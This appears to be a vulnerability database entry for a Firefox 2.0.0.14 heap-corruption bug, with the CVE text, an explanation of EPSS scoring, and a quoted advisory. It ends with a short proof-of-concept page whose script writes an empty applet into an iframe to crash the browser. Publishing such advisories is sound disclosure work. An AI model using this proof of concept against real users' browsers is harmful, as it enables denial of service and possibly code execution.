CVE Descriptions

Mozilla Firefox 2.0.0.14 allows remote attackers to cause a denial of service (heap corruption and application crash) or possibly execute arbitrary code by triggering an error condition during certain Iframe operations between a JSframe write and a JSframe close, as demonstrated by an error in loading an empty Java applet defined by a 'src="javascript:"' sequence.

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/29318/info Mozilla Firefox is prone to a remote denial-of-service vulnerability when running certain JavaScript commands on empty applets in an iframe. Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed. This issue affects Firefox 2.0.0.14; other versions may also be vulnerable. <script> // It might not work on your platform due to a ton of reasons. // tested on WinXP SP2 JRE version 1.6.0_01 function run() { var data = '<applet src="javascript:" id="x">'; y.document.open(); y.document.write(data); y.document.close(); } </script> <input name="button" value="Run" onclick="run()" type="button"> <iframe name="y" id="x" src="" frameborder="1" height="200"></iframe>
